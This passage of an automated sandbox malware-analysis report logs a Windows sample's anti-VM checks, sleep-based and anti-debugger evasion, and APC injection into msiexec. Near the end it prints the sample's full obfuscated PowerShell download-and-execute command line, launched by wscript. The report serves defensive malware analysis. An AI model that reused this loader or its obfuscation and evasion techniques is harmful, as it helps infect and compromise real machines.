              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599763Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599527Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599261Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599141Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598448Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598306Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598049Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597697Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5442Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4462Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6919Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2811Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -31359464925306218s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1788Thread sleep count: 4851 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599763s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1788Thread sleep count: 4934 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599641s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599527s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599261s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -599141s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598938s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598578s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598448s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598306s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598172s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -598049s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -597922s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -597812s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -597697s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99874s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99764s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99642s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99515s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99296s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99186s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -99077s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98953s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98843s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98721s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98354s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98224s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -98046s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97937s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97828s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97718s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97603s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97484s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97374s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97262s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97123s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -97015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96891s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96781s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96671s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96552s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96421s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96299s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96171s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -96062s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95953s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95843s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95734s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95624s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95515s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95406s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95286s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95134s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 6612Thread sleep time: -95015s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599763Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599527Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599261Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599141Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598448Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598306Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598172Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598049Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597922Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597697Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99874Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99764Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99642Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99515Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99296Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99186Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 99077Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98843Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98721Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98354Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98224Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 98046Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97937Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97828Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97718Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97603Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97484Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97374Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97262Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97123Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 97015Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96891Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96781Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96671Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96552Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96421Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96299Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96171Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 96062Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95953Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95843Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95734Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95624Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95515Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95406Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95286Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95134Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 95015Jump to behavior
              Source: powershell.exe, 00000002.00000002.2307123172.0000011FB1570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCorp%SystemRoot%\system32\mswsock.dll22Z0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FD7ED8 CheckRemoteDebuggerPresent,7_2_02FD7ED8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02FDF2CC LdrInitializeThunk,7_2_02FDF2CC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_6800.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4508, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4470000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Sildefdningerne Retable tyranniserer Kevutzoth Slagterbutik Udefineret Billigelserne #>;$Prokuraens='Slgten';<#Joblessness Sejsingers Elementarladningen Disownable Winterfeeding #>;$Cheekbonesncavate=$Saltometer+$host.UI; function Efterbevilget($Semihydrate){If ($Cheekbonesncavate) {$phillipe++;}$Teetotalism=$hunder+$Semihydrate.'Length'-$phillipe; for( $Cheekbones=5;$Cheekbones -lt $Teetotalism;$Cheekbones+=6){$Bevillige=$Cheekbones;$Kirtimukha+=$Semihydrate[$Cheekbones];$Zirian='Delegant';}$Kirtimukha;}function Rationaliseringsgevinsten($Herkan){ & ($Sope) ($Herkan);}$Provokatr=Efterbevilget 'pro yMfyrreoNonadz Fodbi,lasulT gnel WronaAngam/Ov.rn ';$Provokatr+=Efterbevilget ' Sl f5Makes.Cloth0Chi p Emoti( TranWS aciiHutchnGipsdd,onfio bl.gwKrimssshake MathiNSlartTOmadr u vin1M rty0 Over.Cou.t0Re,us; ira sapidWkommei I.fonDoc,s6Selsk4 Mart;Phleg AbortxFyrre6Facon4Dist ;Large And,brLrerfvPic l:Fornj1 Su.d3 Jugo1Super.semis0Zoacu)Ejerk byggeGA veleSprgecByghekKami,oPolyp/Betrd2Relig0 Marg1Pusle0 N,vl0 Mac 1Remme0Kompl1,tats Sner FSelvfi TvinrHamameJordbfConfooOplaexRa pa/Fgte 1Thune3Detal1Har w.Repro0.atbr ';$Laulau=Efterbevilget 'EfteruDihalsSphageUdklkrgrat,-PolypATrkniGbes,yEAhnfen uldktForep ';$dyrlgeforeningens=Efterbevilget 'Ud,ejh EjertRoejot Jakopwheyfs inka: Phil/Subsk/ ubardBylderTotrii PhervBabcoe Kiss..elvogInhaboF reloGolligmel el stumeAffek.Civ lcTour oVolumm C.li/ VineuLsn ncP epr?Snigme.ruthxAllmspSprayo WitcrUngratBo ga=Bio hd ubtoRan awsilicn D sil ,iseo IdeeaNonevdOdont& NonwiSolandK ist=Katte1UnsavMKomteZV.scuMEnd mL Fami1CyathuCotesicocklZAcetao Lign-Co prvPant.hnonlu3NilaszYusarm B,osz AntecVejovpStderfCo ciWHymenCenkelYOut,sh Onses HardkarbejVJottiK Form3Stere9Sc ewGFon mLProfuyMdt,a ';$Tetrapolar126=Efterbevilget 'Wilbu>Reinf ';$Sope=Efterbevilget ' SekuICensueUnd.rx knhj ';$Mollycot46='Leucochroic';$Enteromegalia='\Mejeriernes.Pra';Rationaliseringsgevinsten (Efterbevilget 'Ekspo$UnsadgInfraLPeridoT ttob UndiaUnderLDy,el:greenppluteLBro eADarticRenteekevilHkryddoGisprLballodAlko Eintrar .osmsUlt a= A.pe$F atweBldagNfabriv Unse:RingrAKompepMeltwPOpposDExa,cAImpovtEnredaPalme+U.til$Squ mE ChaiNNou etdeklae b.gsr I,dsoTra.iMLuxemEbr,acgStatiaLjpesL GalaiGrebeafun n ');Rationaliseringsgevinsten (Efterbevilget 'Ind a$ NondGNattolKirkeOBrys.BH mmeaDet clS.bno: Sa,bAVajeeFu wormB milAEditoTCe ilTAn itENonpodKo,taeFla e=Afk.s$GratiDDel,uY PigmR OverLPreapGunpreEMa.keFSolbrO Ste runi,eePenumnPletsISamhrnNott,g Yp,ieS butNP lyrSMiss..melerSDasylpNedfrlHyperI soilT,ibli(Flykk$UncantMagi ECkwyat Agg.R owayAPlyndpModstOV eskLUninnAAa emRUpbre1 skrk2Fir k6Brefr) ntyi ');Rationaliseringsgevinsten (Efterbevilget 'Angel[KokkenFigurE AkkutTekst.Midtls SmieE oldsRWee dvStereIKristCSrintECancepAritmoStrukI D.miNScullTSansem esknaStemmnTzaamASidebGRodfsEUdranrLe de]Milit:De us:Z,cchS archETr inCSelm UO munr ylofID tastFreeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#sildefdningerne retable tyranniserer kevutzoth slagterbutik udefineret billigelserne #>;$prokuraens='slgten';<#joblessness sejsingers elementarladningen disownable winterfeeding #>;$cheekbonesncavate=$saltometer+$host.ui; function efterbevilget($semihydrate){if ($cheekbonesncavate) {$phillipe++;}$teetotalism=$hunder+$semihydrate.'length'-$phillipe; for( $cheekbones=5;$cheekbones -lt $teetotalism;$cheekbones+=6){$bevillige=$cheekbones;$kirtimukha+=$semihydrate[$cheekbones];$zirian='delegant';}$kirtimukha;}function rationaliseringsgevinsten($herkan){ & ($sope) ($herkan);}$provokatr=efterbevilget 'pro ymfyrreononadz fodbi,lasult gnel wronaangam/ov.rn ';$provokatr+=efterbevilget ' sl f5makes.cloth0chi p emoti( tranws aciihutchngipsdd,onfio bl.gwkrimssshake mathinslarttomadr u vin1m rty0 over.cou.t0re,us; ira sapidwkommei i.fondoc,s6selsk4 mart;phleg abortxfyrre6facon4dist ;large and,brlrerfvpic l:fornj1 su.d3 jugo1super.semis0zoacu)ejerk byggega velesprgecbyghekkami,opolyp/betrd2relig0 marg1pusle0 n,vl0 mac 1remme0kompl1,tats sner fselvfi tvinrhamamejordbfconfoooplaexra pa/fgte 1thune3detal1har w.repro0.atbr ';$laulau=efterbevilget 'efterudihalssphageudklkrgrat,-polypatrknigbes,yeahnfen uldktforep ';$dyrlgeforeningens=efterbevilget 'ud,ejh ejertroejot jakopwheyfs inka: phil/subsk/ ubardbyldertotrii phervbabcoe kiss..elvoginhabof relogolligmel el stumeaffek.civ lctour ovolumm c.li/ vineulsn ncp epr?snigme.ruthxallmspsprayo witcrungratbo ga=bio hd ubtoran awsilicn d sil ,iseo ideeanonevdodont& nonwisolandk ist=katte1unsavmkomtezv.scumend ml fami1cyathucotesicocklzacetao lign-co prvpant.hnonlu3nilaszyusarm b,osz antecvejovpstderfco ciwhymencenkelyout,sh onses hardkarbejvjottik form3stere9sc ewgfon mlprofuymdt,a ';$tetrapolar126=efterbevilget 'wilbu>reinf ';$sope=efterbevilget ' sekuicensueund.rx knhj ';$mollycot46='leucochroic';$enteromegalia='\mejeriernes.pra';rationaliseringsgevinsten (efterbevilget 'ekspo$unsadginfralperidot ttob undiaunderldy,el:greenpplutelbro eadarticrenteekevilhkryddogisprlballodalko eintrar .osmsult a= a.pe$f atwebldagnfabriv unse:ringrakompepmeltwpopposdexa,caimpovtenredapalme+u.til$squ me chainnou etdeklae b.gsr i,dsotra.imluxemebr,acgstatialjpesl galaigrebeafun n ');rationaliseringsgevinsten (efterbevilget 'ind a$ nondgnattolkirkeobrys.bh mmeadet cls.bno: sa,bavajeefu wormb milaeditotce iltan itenonpodko,taefla e=afk.s$gratiddel,uy pigmr overlpreapgunpreema.kefsolbro ste runi,eepenumnpletsisamhrnnott,g yp,ies butnp lyrsmiss..melersdasylpnedfrlhyperi soilt,ibli(flykk$uncantmagi eckwyat agg.r owayaplyndpmodstov eskluninnaaa emrupbre1 skrk2fir k6brefr) ntyi ');rationaliseringsgevinsten (efterbevilget 'angel[kokkenfigure akkuttekst.midtls smiee oldsrwee dvstereikristcsrintecanceparitmostruki d.minsculltsansem esknastemmntzaamasidebgrodfseudranrle de]milit:de us:z,cchs archetr incselm uo munr ylofid tastfree
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#sildefdningerne retable tyranniserer kevutzoth slagterbutik udefineret billigelserne #>;$prokuraens='slgten';<#joblessness sejsingers elementarladningen disownable winterfeeding #>;$cheekbonesncavate=$saltometer+$host.ui; function efterbevilget($semihydrate){if ($cheekbonesncavate) {$phillipe++;}$teetotalism=$hunder+$semihydrate.'length'-$phillipe; for( $cheekbones=5;$cheekbones -lt $teetotalism;$cheekbones+=6){$bevillige=$cheekbones;$kirtimukha+=$semihydrate[$cheekbones];$zirian='delegant';}$kirtimukha;}function rationaliseringsgevinsten($herkan){ & ($sope) ($herkan);}$provokatr=efterbevilget 'pro ymfyrreononadz fodbi,lasult gnel wronaangam/ov.rn ';$provokatr+=efterbevilget ' sl f5makes.cloth0chi p emoti( tranws aciihutchngipsdd,onfio bl.gwkrimssshake mathinslarttomadr u vin1m rty0 over.cou.t0re,us; ira sapidwkommei i.fondoc,s6selsk4 mart;phleg abortxfyrre6facon4dist ;large and,brlrerfvpic l:fornj1 su.d3 jugo1super.semis0zoacu)ejerk byggega velesprgecbyghekkami,opolyp/betrd2relig0 marg1pusle0 n,vl0 mac 1remme0kompl1,tats sner fselvfi tvinrhamamejordbfconfoooplaexra pa/fgte 1thune3detal1har w.repro0.atbr ';$laulau=efterbevilget 'efterudihalssphageudklkrgrat,-polypatrknigbes,yeahnfen uldktforep ';$dyrlgeforeningens=efterbevilget 'ud,ejh ejertroejot jakopwheyfs inka: phil/subsk/ ubardbyldertotrii phervbabcoe kiss..elvoginhabof relogolligmel el stumeaffek.civ lctour ovolumm c.li/ vineulsn ncp epr?snigme.ruthxallmspsprayo witcrungratbo ga=bio hd ubtoran awsilicn d sil ,iseo ideeanonevdodont& nonwisolandk ist=katte1unsavmkomtezv.scumend ml fami1cyathucotesicocklzacetao lign-co prvpant.hnonlu3nilaszyusarm b,osz antecvejovpstderfco ciwhymencenkelyout,sh onses hardkarbejvjottik form3stere9sc ewgfon mlprofuymdt,a ';$tetrapolar126=efterbevilget 'wilbu>reinf ';$sope=efterbevilget ' sekuicensueund.rx knhj ';$mollycot46='leucochroic';$enteromegalia='\mejeriernes.pra';rationaliseringsgevinsten (efterbevilget 'ekspo$unsadginfralperidot ttob undiaunderldy,el:greenpplutelbro eadarticrenteekevilhkryddogisprlballodalko eintrar .osmsult a= a.pe$f atwebldagnfabriv unse:ringrakompepmeltwpopposdexa,caimpovtenredapalme+u.til$squ me chainnou etdeklae b.gsr i,dsotra.imluxemebr,acgstatialjpesl galaigrebeafun n ');rationaliseringsgevinsten (efterbevilget 'ind a$ nondgnattolkirkeobrys.bh mmeadet cls.bno: sa,bavajeefu wormb milaeditotce iltan itenonpodko,taefla 